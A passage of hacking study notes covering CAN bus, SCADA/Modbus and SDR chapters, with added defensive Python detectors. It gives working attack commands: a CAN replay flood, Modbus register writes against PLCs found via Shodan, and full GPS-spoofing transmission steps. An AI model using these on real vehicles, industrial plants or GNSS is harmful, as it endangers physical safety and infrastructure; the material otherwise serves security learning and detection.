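    """Combined-log-format line -> dict with ip, ts (datetime), method, path, status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    e["status"] = int(e["status"])
    return e

def detect_password_guessing(lines, path="/login.php", threshold=5, window=timedelta(seconds=60)):
    """Flag each source IP that POSTs to `path` at least `threshold` times within `window`."""
    per_ip = defaultdict(list)
    for line in lines:
        e = parse_access_line(line)
        if e and e["method"] == "POST" and e["path"] == path:
            per_ip[e["ip"]].append((e["ts"], e["status"]))
    alerts = []
    for ip, events in per_ip.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            burst = [ev for ev in events[i:] if ev[0] - start <= window]
            if len(burst) >= threshold:
                alerts.append({
                    "ip": ip,
                    "attempts": len(burst),
                    "failures": sum(1 for _, s in burst if s == 302),
                    "success_seen": any(s == 200 for _, s in burst),
                    "first": burst[0][0].isoformat(),
                })
                break                      # one alert per IP is enough
    return alerts

def _line(ip, second, status):
    """Constructed log line: a POST to the login page at 10:15:<second>."""
    return (f'{ip} - - [12/Mar/2024:10:15:{second:02d} +0000] '
            f'"POST /login.php HTTP/1.1" {status} {1200 if status == 200 else 310}')

SAMPLE_LOG = [_line("10.0.0.5", s, 302) for s in range(1, 7)]   # six failed guesses...
SAMPLE_LOG.append(_line("10.0.0.5", 7, 200))                     # ...then a hit
SAMPLE_LOG.append(_line("10.0.0.9", 3, 302))                     # a user's single typo
SAMPLE_LOG.append('10.0.0.9 - - [12/Mar/2024:10:15:04 +0000] "GET /index.php HTTP/1.1" 200 5120')

if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_LOG):
        print(alert)
```

A Cluster Bomb run is a few billion of these lines from one address, so the threshold hardly matters; what matters is that the detector keys on the login path and on status, not on the User-Agent, which Intruder lets the tester set to anything.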


⚡ Quick Reference

HTTP ports:  80 (HTTP)  443 (HTTPS)
Proxy:       127.0.0.1:8080 (BurpSuite default)
DVWA:        Deliberately Vulnerable Web App (practice target)
OWASP BWA:  OWASP Broken Web Apps VM (practice target)


Chapter 13 — Automobile Networks (CAN Bus)


The CAN Protocol

CAN (Controller Area Network) — the dominant protocol for in-vehicle communication between microcontrollers, sensors, gauges and actuators.

  • Developed by Robert Bosch GmbH (Germany), released at an SAE meeting in 1986
  • Standardized as ISO 11898-1 and ISO 11898-2
  • Designed for robust communication without a host computer
  • Operates like a broadcast network — every node sees every message
  • Runs over two wires: CAN High and CAN Low (differential signaling)
  • No security — no encryption, no authentication

CAN Message Types

| Type | Purpose |
|------|---------|
| Data Frame | The only frame used for actual data transmission |
| Remote Frame | Destination node requests data from the source |
| Error Frame | Signals an error on the bus |
| Overload Frame | Signals an internal overload condition |

CAN Packet Structure (Standard)

┌──────────────┬───────────┬──────────────────┬───────────┐
│ Arbitration  │ Identifier│ Data Length Code │   Data    │
│     ID       │ Extension │   (DLC: 0-8B)    │ (up to 8B)│
└──────────────┴───────────┴──────────────────┴───────────┘

  • Arbitration ID — ID of the sending device
  • No source address in the packet — spoofing is trivial
  • Extended CAN packets: same structure but chained for longer IDs (backward compatible)

Security Issues

  • No encryption → MitM attacks possible
  • No authentication → anyone can spoof messages
  • Broadcast → every node sees every packet
  • Some manufacturers added auth for mission-critical systems (brakes, software updates), but not all

OBD-II Connector

Every modern car has an OBD-II port (under the dashboard) — 16 pins.
Mechanics connect computers here to read diagnostic data.
Hackers can too — connect here to send messages on the CAN bus.


can-utils (SocketCAN)

Linux tools for communicating with CAN networks. Contributed by Volkswagen Research to the Linux kernel.

# Install
sudo apt install can-utils
# or
git clone https://github.com/linux-can/can-utils

Key Tools

| Tool | Purpose |
|------|---------|
| candump | Display, filter, log CAN traffic |
| canplayer | Replay CAN log files |
| cansend | Send a single CAN frame |
| cangen | Generate random CAN traffic |
| cansniffer | Display CAN data differences |
| canlogserver | Log CAN frames from a remote/local host |

Setting Up a Virtual CAN Network

# Load vcan kernel module
sudo modprobe vcan

# Create virtual interface (name it vcan0 so the next two commands refer to the same device)
sudo ip link add dev vcan0 type vcan
sudo ip link set up vcan0

# Verify
ifconfig vcan0

ICSim β€” CAN Simulator

CAN-Bus simulator by Craig Smith (author of The Car Hackers Handbook).

# Install dependencies
sudo apt-get install libsdl2-dev libsdl2-image-dev -y

# Download ICSim
git clone https://github.com/zombieCraig/ICSim
cd ICSim

# Set up virtual CAN
./setup_vcan.sh

# Start the instrument panel (speedometer, doors, signals)
./icsim vcan0

# Start the controller
./controls vcan0

Sniffing CAN Traffic

# Colorized live CAN traffic
cansniffer -c vcan0

# Filter for a specific Arbitration ID
cansniffer -c vcan0
# then type:
-000000    # (masks everything)
+161       # (show only ID 161)

# Capture and log to file
candump -c -l vcan0

# Capture + view + ASCII output simultaneously
candump -c -l -s 0 -a vcan0

Replaying CAN Traffic

# Replay a captured log file
canplayer -I candump-XXXXXXXXXX.log

Sending Custom CAN Frames — cansend

# Format: cansend <interface> <ArbitrationID>#<data>
cansend vcan0 161#000005500108000d

Reverse Engineering — Accelerate the Car

Goal: Find which CAN packet accelerates the vehicle to 100 mph.

# Step 1: Start sniffer
cansniffer -c vcan0

# Step 2: Press UP arrow in controller → accelerate to 100mph
# Watch for rapidly changing values (shown in red) → likely candidates

# Step 3: Filter for suspected ID
-000000
+244

# Step 4: Record the values at 100mph

# Step 5: Replay that packet
cansend vcan0 244#0000003812

# Step 6: If a single packet isn't enough (normal CAN packets override it),
# flood with continuous packets
while true; do cansend vcan0 244#0000003812; done
# Car accelerates to 100mph — ghost in the machine!
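The flood in Step 6 is loud on the bus, and that is what a CAN intrusion detector keys on: a frame ID that normally arrives at a fixed rate suddenly arrives orders of magnitude faster. As an added example (not code from the book or these notes), here is a parser for the `candump -l` log format used above and a rate-based detector run over a constructed log: ID 244 at its normal 10 Hz for two seconds, then 200 frames in the third second, with ID 161 ticking along at a steady rate as a control. The timestamps and the "normal" rates are assumptions made for the sample.

```python
# Added example (not code from the book or these notes): parse candump -l log
# lines and spot the flood that Step 6 produces. The sample log is constructed:
# ID 244 at its normal 10 Hz for two seconds, then 200 frames in the third
# second, with ID 161 ticking along steadily as a control.
import re
from collections import defaultdict

FRAME_RE = re.compile(
    r'^\((?P<ts>\d+\.\d+)\) (?P<iface>\S+) (?P<id>[0-9A-Fa-f]{3,8})#(?P<data>[0-9A-Fa-f]*)$')

def parse_candump_line(line: str):
    """'(1700000000.000000) vcan0 244#0000003812' -> (timestamp, iface, id, data bytes)."""
    m = FRAME_RE.match(line)
    if not m:
        return None
    return float(m["ts"]), m["iface"], int(m["id"], 16), bytes.fromhex(m["data"])

def frames_per_window(lines, window=1.0):
    """{can_id: [count in window 0, window 1, ...]} relative to each ID's first frame."""
    stamps = defaultdict(list)
    for line in lines:
        f = parse_candump_line(line)
        if f:
            stamps[f[2]].append(f[0])
    result = {}
    for can_id, ts in stamps.items():
        ts.sort()
        buckets = defaultdict(int)
        for t in ts:
            buckets[int((t - ts[0]) // window)] += 1
        result[can_id] = [buckets[i] for i in range(max(buckets) + 1)]
    return result

def detect_flood(lines, window=1.0, factor=5.0):
    """Alert when an ID's frame count in a later window exceeds `factor` x its first window.
    The first window is taken as the baseline, so the capture must start on a quiet bus.
    Returns [(can_id, window_index, count, baseline)]."""
    alerts = []
    for can_id, counts in frames_per_window(lines, window).items():
        baseline = counts[0]
        for idx, n in enumerate(counts[1:], start=1):
            if n > factor * baseline:
                alerts.append((can_id, idx, n, baseline))
                break
    return alerts

def make_sample_log():
    base_us = 1_700_000_000_000_000          # constructed epoch timestamp, microseconds

    def fmt(us, frame):
        return f"({us // 1_000_000}.{us % 1_000_000:06d}) vcan0 {frame}"

    lines = []
    for i in range(20):                                   # 244 at 10 Hz for 2 s
        lines.append(fmt(base_us + i * 100_000, "244#0000000000"))
    for k in range(200):                                  # then a 200-frame burst
        lines.append(fmt(base_us + 2_000_000 + k * 5_000, "244#0000003812"))
    for i in range(15):                                   # 161 at 5 Hz throughout
        lines.append(fmt(base_us + i * 200_000, "161#000005500108000d"))
    return lines

SAMPLE_LOG = make_sample_log()

if __name__ == "__main__":
    for can_id, idx, n, baseline in detect_flood(SAMPLE_LOG):
        print(f"ID {can_id:03x}: {n} frames in window {idx} (baseline {baseline})")
```

This is the same idea as the hardening some manufacturers apply for the mission-critical IDs mentioned earlier: a gateway or the ECU itself knows how often a given ID should legitimately appear, and a replay flood breaks that timing before it breaks anything else.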

Key Fob Hacking — SARA

PKES (Passive Keyless Entry and Start) — proximity unlocking/starting. Introduced 1999.

SARA = Signal Amplification Relay Attack

Normal:  Key fob (LF signal) ──────────────► Car (nearby, ~10cm)

Attack:  Key fob ──► Emitter ──(amplified RF)──► Receiver ──► Car
         (fob is inside house)                   (near car)

  • Signal is relayed (amplified) across distance → car thinks the fob is nearby → unlocks
  • No need to decrypt — just relay the encrypted signal (like pass-the-hash)
  • Works on most cars before 2014, Honda cars up to 2021

Required hardware: 2 RF transceivers (emitter + receiver) operating at ~2.5GHz


⚡ Exercises

  1. Download can-utils.
  2. Download ICSim.
  3. Create a virtual CAN network (vcan0).
  4. Replicate the CAN replay attack from this chapter.


Chapter 14 — SCADA/ICS Networks


What is SCADA/ICS?

SCADA = Supervisory Control and Data Acquisition
ICS = Industrial Control Systems

Controls physical infrastructure: petroleum refineries, manufacturing, water/sewage plants, electric grid, pipelines.

Key difference from IT systems: many proprietary protocols, not just TCP/IP.


Major SCADA Manufacturers

  • Siemens
  • Honeywell
  • Toshiba
  • Rockwell Automation / Allen-Bradley
  • Mitsubishi
  • GE
  • Schneider Electric

Each uses varied (sometimes proprietary) protocols — security through obscurity has historically protected them. That era is ending.


SCADA Communication Protocols

| Protocol | Notes |
|----------|-------|
| Modbus | Most widely used. Original from 1979. |
| DNP3 | Utility/energy sector |
| ICCP | Inter-control center comms |
| CIP / EtherNet/IP | Rockwell/Allen-Bradley |
| CompoNet / ControlNet / DeviceNet | Industrial networks |
| OPC | OLE for Process Control |
| PROFIBUS | Process Field Bus |
| Foundation Fieldbus H1 | Process automation |

Modbus — The Most Important Protocol

Modbus RTU (Serial)

  • Developed 1979 by Modicon (now Schneider Electric)
  • Operates at OSI Layer 7
  • Lightweight, simple, request/reply model
  • Data limit: 253 bytes
  • Up to 32 devices on a serial link, each with a unique ID
  • Master/Slave architecture — only the master initiates queries

Master → query (slave ID, function code, data, checksum) → Slave
Master ← response ← Slave

Modbus TCP

  • Modbus protocol encapsulated in TCP/IP
  • Same function codes + request/reply
  • Port 502
  • Adds 7-byte MBAP header (2 header + 2 protocol ID + 2 length + 1 unit ID)
  • Removes CRC checksum (TCP handles integrity)

Modbus Function Codes

| Code | Function |
|------|----------|
| 01 | Read Coil Status |
| 02 | Read Input Status |
| 03 | Read Holding Registers |
| 04 | Read Input Registers |
| 05 | Force Single Coil |
| 06 | Preset Single Register |
| 08 | Diagnostics |
| 15 | Force Multiple Coils |
| 16 | Preset Multiple Registers |

Function Code 8 — Diagnostics:
Sub-function 04 = Force Listen Only Mode → can create a DoS on Modbus devices.


Modbus Security Problems

| Issue | Impact |
|-------|--------|
| No authentication | Anyone with a valid packet can control devices |
| No encryption | All traffic in cleartext — sniffable |
| No checksum (TCP) | Attacker can spoof packets |
| No broadcast suppression | Flood of messages = DoS |
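Because there is nothing to authenticate, the only thing a Modbus/TCP monitor can do is read the frame and judge the function code. As an added example (not code from the book or these notes), here is a builder and dissector for the 7-byte MBAP header plus PDU described above, and a triage function that separates reads from writes and singles out the Diagnostics sub-function 04 (Force Listen Only) from the function-code table. The three sample frames mirror the modbus-cli reads and writes later in this chapter (holding register 100 is %MW100); the unit ID and transaction IDs are constructed.

```python
# Added example (not code from the book or these notes): build and dissect
# Modbus/TCP frames and rank them by what they can do to a process. The MBAP
# header fields (transaction id, protocol id, length, unit id) follow the
# protocol; the sample frames, addresses and unit id are constructed.
import struct

FUNCTION_NAMES = {
    1: "Read Coils", 2: "Read Discrete Inputs", 3: "Read Holding Registers",
    4: "Read Input Registers", 5: "Write Single Coil", 6: "Write Single Register",
    8: "Diagnostics", 15: "Write Multiple Coils", 16: "Write Multiple Registers",
}
WRITE_CODES = {5, 6, 15, 16}
FORCE_LISTEN_ONLY = 0x0004          # Diagnostics sub-function from the notes

def build_modbus_tcp(transaction_id: int, unit_id: int, function_code: int, data: bytes) -> bytes:
    pdu = bytes([function_code]) + data
    # MBAP: transaction id (2), protocol id (2, always 0), length (2) = unit id + PDU, unit id (1)
    mbap = struct.pack("!HHHB", transaction_id, 0, len(pdu) + 1, unit_id)
    return mbap + pdu

def parse_modbus_tcp(frame: bytes) -> dict:
    if len(frame) < 8:
        raise ValueError("frame too short")
    tid, pid, length, uid = struct.unpack("!HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol id is not 0: not Modbus")
    if length != len(frame) - 6:
        raise ValueError("MBAP length does not match frame size")
    fc = frame[7]
    return {"transaction_id": tid, "unit_id": uid, "function_code": fc,
            "function": FUNCTION_NAMES.get(fc, "unknown"), "data": frame[8:]}

def is_modbus(frame: bytes) -> bool:
    try:
        parse_modbus_tcp(frame)
        return True
    except ValueError:
        return False

def classify(frame: bytes) -> str:
    """'read' / 'write' / 'critical' / 'unknown' plus a one-line reason."""
    p = parse_modbus_tcp(frame)
    fc, data = p["function_code"], p["data"]
    if fc == 8 and len(data) >= 2 and struct.unpack("!H", data[:2])[0] == FORCE_LISTEN_ONLY:
        return f"critical: Diagnostics sub-function 04 (Force Listen Only) silences unit {p['unit_id']}"
    if fc in WRITE_CODES:
        return f"write: {p['function']} on unit {p['unit_id']} changes process state"
    if fc in FUNCTION_NAMES:
        return f"read: {p['function']} on unit {p['unit_id']}"
    return f"unknown: function code {fc}"

def triage(frames):
    return [classify(f) for f in frames]

# Requests matching the modbus-cli commands in this chapter (holding register 100 = %MW100)
READ_10_REGS = build_modbus_tcp(1, 1, 3, struct.pack("!HH", 100, 10))
WRITE_2_REGS = build_modbus_tcp(2, 1, 16, struct.pack("!HHB", 100, 2, 4) + struct.pack("!HH", 1, 1))
LISTEN_ONLY = build_modbus_tcp(3, 1, 8, struct.pack("!HH", FORCE_LISTEN_ONLY, 0))

if __name__ == "__main__":
    for verdict in triage([READ_10_REGS, WRITE_2_REGS, LISTEN_ONLY]):
        print(verdict)
```

In practice this is the rule set of an ICS firewall or a passive monitor: writes and diagnostics are allowed only from the engineering workstation's address, and anything else on port 502 is logged and dropped. Nothing in the frame itself tells the device who sent it, which is the whole of the "no authentication" row above.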

Finding SCADA with Shodan

Search on shodan.io: TM221

Returns IP addresses of Schneider Electric TM221 PLCs exposed to the internet.
Many are vulnerable and unpatched.


Hacking Modbus with modbus-cli

# Install
gem install modbus-cli

# Help
modbus --help

Address Terminology (Schneider Electric)

| Schneider Notation | Modicon Notation | Type |
|--------------------|------------------|------|
| %MW100 | 400101 | Holding Register |
| %M0 | 101 | Coil (Boolean ON/OFF) |

Reading Values

# Read 10 holding registers starting at %MW100
modbus read <IP> %MW100 10

# Read 10 coils (Boolean values) starting at 101
modbus read <IP> 101 10

# Save 100 values to file
modbus read --output scadaoutput.txt <IP> %MW100 100

Writing Values

# Write the value 1 to 10 holding registers starting at %MW100
# (coils are addressed as %M0 / 101 in the table above, not %MW)
modbus write <IP> %MW100 1 1 1 1 1 1 1 1 1 1

# Verify
modbus read <IP> %MW100 10

🎯 Impact: Writing to coils/registers can physically control industrial equipment — valves, motors, breakers, actuators.


Real-World Context

OTW notes this tool was used during the Ukraine/Russia war to disrupt Russian industrial systems.

SCADA/ICS hacking in cyber warfare can:

  • Disable power grids
  • Disrupt water treatment
  • Sabotage manufacturing
  • Create physical destruction (cf. Stuxnet against Iranian centrifuges)

⚡ Key Commands Summary

gem install modbus-cli                              # Install
modbus read <IP> %MW100 10                         # Read 10 registers
modbus read <IP> 101 10                            # Read 10 coils
modbus write <IP> %MW100 1 1 1 1 1 1 1 1 1 1      # Write to registers
modbus read --output out.txt <IP> %MW100 100       # Save to file


Chapter 15 — Radio Frequency (RF) Networks & SDR


Why RF for Hackers?

RF signals are everywhere and largely unsecured:

  • Car key fobs, garage doors, wireless switches
  • Aircraft communication (ATC)
  • Aircraft position (ADS-B)
  • Pager messages (often unencrypted)
  • Cellular (2G/3G/4G)
  • Police and military comms
  • Satellite signals
  • SCADA remote terminal units
  • GPS signals

Many have little or no security. Those that do are often vulnerable to replay attacks (no timestamps/randomization).


Basic Radio Terminology

| Term | Definition |
|---|---|
| Amplitude | Strength of the radio signal |
| Frequency (Hz) | Cycles per second of the radio wave |
| Sample Rate | Rate at which the analog signal is captured digitally (Hz) |
| Filter | Removes noise and interference from signals |
| DSP | Digital Signal Processing — analyze/modify signals via software |

Radio Attack Methods

| Method | Description |
|---|---|
| Sniffing | Passively capture and study RF traffic |
| Replay | Record and retransmit a signal (no timestamps → works on many systems) |
| Signal Deception | Spoof a valid signal (need to know packet structure + keys) |
| Signal Hijacking | Pull target onto fake network (femtocell, Stingray) |
| DoS | Jam or flood signals to block communication |

SDR Hardware Comparison

| Hardware | Price | Tx/Rx | Frequency | Best For |
|---|---|---|---|---|
| RTL-SDR | ~$35 | Rx only | 500kHz–1.75GHz | Beginners, listening only |
| HackRF One | ~$300 | Half-duplex | 1MHz–6GHz | Replay attacks, beginner Tx |
| BladeRF | ~$400 | Full-duplex | to 3.8GHz | High-performance |
| LimeSDR | ~$300 | Full-duplex | varies | Apps-enabled, broadest support |
| USRP | $500+ | Full-duplex | varies | Research & development |

Recommendation:

  • Starting out → RTL-SDR (~$35, receive-only)
  • Need to transmit (replay attacks) → HackRF One
  • High-performance / full-duplex → BladeRF or LimeSDR


Setting Up RTL-SDR + HDSDR (Windows)

1. Download Zadig from http://zadig.akeo.ie/
2. Install WinUSB driver for RTL device ("Bulk-In, Interface 0")
3. Download HDSDR from http://hdsdr.de/download/HDSDR_install.exe
4. Download ExtIO_RTL2832.DLL → copy to HDSDR install dir
5. Launch HDSDR → select ExtIO_RTL2832.DLL

Sampling Rate

Set via the Bandwidth button. For FM radio, ≥48 kHz is sufficient: the human ear cannot distinguish anything a higher rate would add.

Listen to FM Radio

  1. Click FM mode icon
  2. Set Frequency to your local FM station (e.g. 101.5 MHz)
  3. Adjust volume slider

Intercept Aircraft Communications

Aircraft voice comms use AM radio (not FM — AM travels farther):

| Band | Frequency | Use |
|---|---|---|
| HF | 3–30 MHz | Long-range, intercontinental (bounces off ionosphere) |
| VHF | 118–137 MHz | Line-of-sight, high quality (local airport) |

1. Open HDSDR
2. Set Mode to "AM", Frequency Manager to "Air"
3. Set sampling rate ≥ 40 kHz (2x max human voice frequency)
4. Google your local airport → find ATC frequencies
   (e.g. Tower: 118.9, Ground: 121.7)
5. Navigate to that frequency → red spike = activity → listen!

Track Aircraft Position — ADS-B with dump1090

Every aircraft broadcasts an ADS-B signal every second containing:

  • GPS location
  • Altitude
  • Ground speed
  • Aircraft ID

# Install dump1090 (antirez fork) and build it
git clone https://github.com/antirez/dump1090
cd dump1090
make

# Or use DragonOS (Linux distro designed for SDR), which ships dump1090
# https://sourceforge.net/projects/dragonos-focal/

# Run (default console output)
./dump1090

# Raw hex frames only, one per line
./dump1090 --raw

# Interactive table (updates per second)
./dump1090 --interactive

# Map overlay in browser (like FlightRadar24 for your area)
./dump1090 --interactive --net
# then open: http://localhost:8080
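The `--raw` output above prints each received frame as `*<hex>;`. As an added example (not part of the book or of dump1090), the following Python decodes a DF17 aircraft-identification frame from such a line and verifies its 24-bit CRC, so a monitoring script can discard corrupted frames instead of plotting them. The sample line is constructed from the public EasyJet test vector used in the pyModeS documentation.

```python
# Mode S 6-bit charset: index 1-26 = A-Z, 32 = space, 48-57 = digits, '#' = unused
CHARSET = "#ABCDEFGHIJKLMNOPQRSTUVWXYZ##### ###############0123456789######"
GENERATOR = 0xFFF409  # low 24 bits of the Mode S CRC polynomial (0x1FFF409)

# Constructed sample in dump1090 --raw format, using the public pyModeS test vector
SAMPLE_LINE = "*8d406b902015a678d4d220aa4bda;"


def modes_crc(msg: bytes) -> int:
    """Remainder of the whole 112-bit frame divided by the generator; 0 means intact."""
    crc = 0
    for byte in msg:
        for i in range(7, -1, -1):
            top = (crc >> 23) & 1
            crc = ((crc << 1) | ((byte >> i) & 1)) & 0xFFFFFF
            if top:
                crc ^= GENERATOR
    return crc


def decode_raw_line(line: str) -> dict:
    """Parse one '*<hex>;' line; decode the callsign of DF17 type-code 1..4 frames."""
    msg = bytes.fromhex(line.strip().strip("*;"))
    if len(msg) != 14:
        raise ValueError("only 112-bit extended squitter frames are handled here")
    info = {
        "df": msg[0] >> 3,                     # downlink format (17 = ADS-B)
        "icao": msg[1:4].hex().upper(),        # 24-bit aircraft address
        "crc_ok": modes_crc(msg) == 0,         # False -> corrupted, drop the frame
    }
    me = msg[4:11]                             # 56-bit message (ME) field
    info["tc"] = me[0] >> 3                    # type code
    if info["df"] == 17 and 1 <= info["tc"] <= 4:
        bits = int.from_bytes(me[1:7], "big")  # 48 bits = 8 six-bit characters
        info["callsign"] = "".join(
            CHARSET[(bits >> (42 - 6 * k)) & 0x3F] for k in range(8)).strip()
    return info


if __name__ == "__main__":
    print(decode_raw_line(SAMPLE_LINE))
```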

GPS Spoofing — Hide Your Location

You can spoof your GPS position using HackRF One (must be able to transmit).

# Step 1: Create directory and download GPS spoof software
mkdir GPS_SPOOF && cd GPS_SPOOF
sudo git clone https://github.com/osqzss/gps-sdr-sim.git
cd gps-sdr-sim

# Step 2: Compile (with motion support so spoof appears moving, not static)
sudo gcc gpssim.c -lm -O3 -o gps-sdr-sim -DUSER_MOTION_SIZE=4000

# Step 3: Download today's GPS satellite ephemeris file (requires free registration)
# https://cddis.nasa.gov/archive/gnss/data/daily/YEAR/brdc/

# Step 4: Find GPS coordinates of target location (Google Maps)
# Example: The Kremlin, Moscow = 55.75911, 37.61640

# Step 5: Generate spoofed GPS signal file
sudo ./gps-sdr-sim -b 8 -e brdc0010.22n -l 55.75911,37.61640,100

# Step 6: Transmit with HackRF (GPS frequency = 1575.42 MHz)
sudo hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0

# Result: Anyone tracking your GPS signal sees you in the Kremlin!

Real-World RF Attack Scenarios

| Target | Attack | Tool |
|---|---|---|
| Car key fob | SARA relay attack | RF transceivers |
| Garage door | Replay attack | HackRF + GNU Radio |
| Aircraft ATC | Passive interception | RTL-SDR + HDSDR |
| Aircraft position | ADS-B monitoring | RTL-SDR + dump1090 |
| GPS tracking | GPS spoofing | HackRF + gps-sdr-sim |
| Pager messages | Sniff unencrypted data | RTL-SDR + multimon-ng |
| SCADA RTUs | Intercept radio control | SDR + protocol analysis |

⚡ Exercises

  1. Install the HDSDR software.
  2. Listen to your local airport ATC communications.
  3. Use RTL-SDR + dump1090 to capture aircraft location and speed data in your area.


Appendix A — Cyberwarrior Wisdom of Master OTW


"Hacking is the new martial art of the 21st century. To become a master hacker, you must think strategically and analytically." — OTW


The 23 Rules

1. Fools talk. The wise listen.
2. Hacking is a process, not a technology or collection of tools.
3. Hacking is the ultimate martial art.
4. If a service is free, you are not the customer; you are the product.
5. Only the fool goes to battle without adequate reconnaissance of their enemy.
6. "Listen" closely and intently to your enemy; they will tell you everything you need to know to defeat them.
7. If you believe in nothing, you can be led to believe anything.
8. Every adversary — no matter how strong and powerful — always has a weakness. Find the weakness and exploit it.
9. A great offense might win the battle, but an impregnable defense wins the war.
10. Turn the power and strength of your opponent against them.
11. The battle often goes NOT to the strongest but to the most persistent.
12. There is ALWAYS opportunity in chaos.
13. Avoid your adversary's strengths and attack their weaknesses.
14. Never become predictable.
15. When faced with an adversary of overwhelming power and strength, do not face them head-on. Strike only when you have the element of surprise.
16. Understanding human psychology, motivation, and behavior is one of the hacker's most important tools.
17. A series of persistent, small wins will defeat your opponent.
18. Create confusion and dissension within the ranks of your opponent.
19. At times, it can be advantageous to retreat to lure your opponent into a vulnerable and indefensible position.
20. People on social media are much less than they appear.
21. In cyber war, industrial facilities can be both a target and a weapon.
22. To remain safe and anonymous on the Internet, you must have a thorough and deep understanding of digital forensics.
23. Humility makes you stronger; hubris makes you vulnerable.

Key Themes

On Reconnaissance: Rules 5, 6 — never attack blind. Recon first, always.

On Persistence: Rules 11, 17 — skill matters less than determination and consistency.

On Deception: Rules 14, 15, 18, 19 — unpredictability and misdirection are weapons.

On Psychology: Rules 7, 16, 20 — humans are the weakest link. Understand them.

On Defense: Rules 9, 22 — offense is flashy, but defense wins long-term.

On Ego: Rules 4, 23 — stay humble, stay skeptical.

